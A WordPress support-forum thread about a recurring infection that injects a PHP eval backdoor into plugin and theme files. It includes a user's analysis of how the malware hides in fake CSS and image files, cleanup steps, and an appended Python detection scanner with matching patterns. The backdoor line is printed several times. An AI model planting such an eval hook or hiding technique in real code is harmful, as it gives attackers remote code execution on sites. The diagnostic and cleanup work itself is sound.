• Hello,

    In the main plugin file the following code gets added automatically every-time the page is refreshed:

    =======================
    @eval($_POST["wp_ajx_request"]);
    =======================

    I tried cleaning it manually from all the files, removed wp-vcd.php, wp-tmp.php files from /wp-includes/ folder.

    I tried using online scan tools and could not find what malware is causing this problem.


Viewing 8 replies - 1 through 8 (of 8 total)
  • Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    Rather than asking “what malware”, focus on cleaning. Assume *every single* .php file on your server could be infected. Remove them all and replace them with new files from clean sources (e.g., www.ads-software.com). Recreate your wp-config.php file from the wp-config-sample.php.

    It’s not fun, it’s not fast.

    Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

    Thread Starter meetgerry

    (@meetgerry)

    I have been battling this for the last 7 hours. I wouldn't have sought help here without giving the best try I could. I already replaced the new version of WP (wordpress-4.9.8-en_AU).

    I replaced all the plugin files. I even checked the DB, I even managed to run through licensed theme files.

    Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    Make sure you delete wp-admin and wp-includes before re-uploading WP, and check wp-contents/uploads/* for .php files.

    Also, install WordFence and run a “high sensitivity scan”.

    Thread Starter meetgerry

    (@meetgerry)

    I tried what you said and there are no .php files in the /uploads folder.

    Funniest thing: I tried WordFence and even that plugin gets deactivated because that gets written on it.

    I even worked on the permissions of the folders and that did not help.


    Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    Check .htaccess, wp-config.php and look for hidden files. Also, check for .js files that don’t belong.

    Thread Starter meetgerry

    (@meetgerry)

    I even tried Quttera Web Malware Scanner and it did not help.

    Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    Your site is hacked. That’s the plain and simple truth. Change every password related to it — every WP user password, your hosting password, and your DB password. Backup your database and uploads and discard everything else. Reinstall WP, your themes, and data. And, if you’re unable to do it, hire one of the firms that specializes in cleaning WP sites.

    Hi!

    I searched the internet for a solution to this problem. I did not find anything, so I analyzed all my system manually and found the following regarding this hack.

    – It hides in .css files and images (jpg, png, gif). In my case it was in the “Product Gallery Slider” plugin with the name “bootstrap.min.css”, but it really is PHP.

    – It is called at the beginning of the plugin. In my case, "require_once(dirname(__FILE__) .'/css/bootstrap.min.css');" in woocommerce-slider.php.

    – According to the code, it performs the following actions:
    — Two new classes, “WpPlLoadContent” and “WpPlaginLoad”
    — Creates MySQL data in “postmeta” with meta_key “_wp_session_tocen_temporery”
    — Sends all posts from "post WHERE post_status="publish" AND (post_type="post" OR post_type="page")" to one IP (hack server).

    — Modify base archives:
    * /wp-admin/includes/class-pclzip.php
    * /wp-includes/SimplePie/Cache/File.php

    — Insert code "@eval($_POST["wp_ajx_request"]);" in:
    * functions.php of the THEMES
    * base file .php of the ACTIVE PLUGINS

    — Create fake images with hack code (eval).
    I clone your images with “filename”-122×356

    Solution for this.

    1. Maintenance mode: do NOT refresh the URL before finishing the process (wp-admin yes)
    2. Search for the fake css code (Wordfence High Sensitivity Scanner) or search manually (Dreamweaver or Notepad++)
    3. Remove or clear this hack file and search for the require or include of this file.
    5. Remove all -122×365 images
    6. Replace base archives (class-pclzip.php and Cache/File.php)
    7. Sanitize all plugin .php files (remove @eval) for its code.
    8. Activate all plugins
    9. Run!

    Sorry for my English, Google Translate
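
As an added example (not code from this thread or from any plugin named in it), a read-only Python scan for the indicators listed in the reply above: the injected eval line, PHP hidden in .css or image files, a require/include of such a file, and the -122×356 / -122×365 image names. The sample tree, its paths and the reason labels are constructed for the demo.

```python
import os, re, sys, tempfile
# Indicators reported in the thread; regexes and reason labels are this example's own.
EVAL_RE = re.compile(rb"@eval\(\s*\$_POST\[\s*[\"']wp_ajx_request[\"']\s*\]\s*\)")
PHP_TAG_RE = re.compile(rb"<\?php", re.I)
INCLUDE_RE = re.compile(rb"\b(?:require|include)(?:_once)?\b[^;]*?\.(?:css|jpe?g|png|gif)['\"]", re.I)
# The thread gives both 122x356 and 122x365, so match either.
FAKE_IMG_RE = re.compile(r"-122[x×](?:356|365)\.(?:jpe?g|png|gif)$", re.I)
STATIC_EXT = (".css", ".jpg", ".jpeg", ".png", ".gif")

def scan_tree(root):
    """Return sorted (relative_path, reason) findings; never modifies files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if FAKE_IMG_RE.search(name):
                findings.append((rel, "fake-image-name"))
            with open(path, "rb") as fh:
                data = fh.read()
            if name.lower().endswith(".php"):
                if EVAL_RE.search(data):
                    findings.append((rel, "eval-backdoor"))
                if INCLUDE_RE.search(data):  # PHP loading a "static" file as code
                    findings.append((rel, "includes-static-file"))
            elif name.lower().endswith(STATIC_EXT) and PHP_TAG_RE.search(data):
                findings.append((rel, "php-in-static-file"))
    return sorted(findings)

def build_demo_tree(root):
    """Write a constructed sample tree (directory names are made up)."""
    p = "wp-content/plugins/slider/"
    samples = {
        p + "woocommerce-slider.php": b"<?php\nrequire_once(dirname(__FILE__) .'/css/bootstrap.min.css');\n",
        p + "css/bootstrap.min.css": b"<?php class WpPlaginLoad {}\n",
        "wp-content/themes/demo/functions.php": b"<?php\n@eval($_POST[\"wp_ajx_request\"]);\n",
        "wp-content/themes/demo/style.css": b"body { margin: 0; }\n",
        "wp-content/uploads/photo-122x356.jpg": b"\xff\xd8\xff\xe0<?php /* placeholder */",
        "wp-content/uploads/photo-150x150.jpg": b"\xff\xd8\xff\xe0",
    }
    for rel, body in samples.items():
        os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as demo:
        build_demo_tree(demo)
        print(*scan_tree(sys.argv[1] if sys.argv[1:] else demo), sep="\n")
```

Pass a WordPress root as the first argument to scan a real tree; a hit is a lead for manual review, not proof, and a clean result does not rule out other variants.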
